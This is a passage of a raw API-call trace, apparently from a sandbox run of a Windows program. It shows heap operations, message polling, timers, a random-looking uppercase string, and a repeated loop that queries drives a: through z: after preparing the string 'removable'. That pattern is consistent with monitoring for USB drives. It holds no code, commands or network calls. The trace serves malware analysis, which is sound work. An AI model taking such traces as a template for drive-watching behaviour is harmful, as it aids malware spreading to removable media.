Flags=0x0, Size=0x10) returned 0x14bd208 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.620] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0218.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.620] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0218.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.621] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.621] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.621] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.621] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.621] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.621] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.622] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.622] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.622] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.622] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.622] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.623] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.623] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.623] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.623] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.623] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.623] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.624] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.624] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.624] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.624] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.624] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.624] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.625] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.625] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.625] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.625] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.625] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.626] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.626] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.626] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.626] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.626] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.627] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.627] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.627] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0218.627] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.627] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.628] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.628] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.628] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.628] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.628] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.629] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.629] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.629] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.629] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0218.629] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.629] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.630] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.630] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.630] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.630] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.630] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0218.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.631] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.631] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.631] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.631] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.632] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.632] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.632] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.632] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.633] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.633] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.633] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.633] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.633] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.633] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.634] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.634] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.634] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.634] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.634] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.635] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.635] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.635] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.635] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.635] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.636] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.636] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.636] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0218.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.637] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0218.637] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0218.637] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.638] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.638] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.638] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.638] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0218.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.639] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.639] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.639] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.639] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.639] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.639] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.640] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.640] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.640] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.640] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.641] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.641] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.641] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.641] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.641] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.641] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.642] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.735] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.735] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.736] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.736] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.736] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.736] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.737] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.737] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.737] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.737] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.738] HeapFree (in: hHeap=0x12c0000, 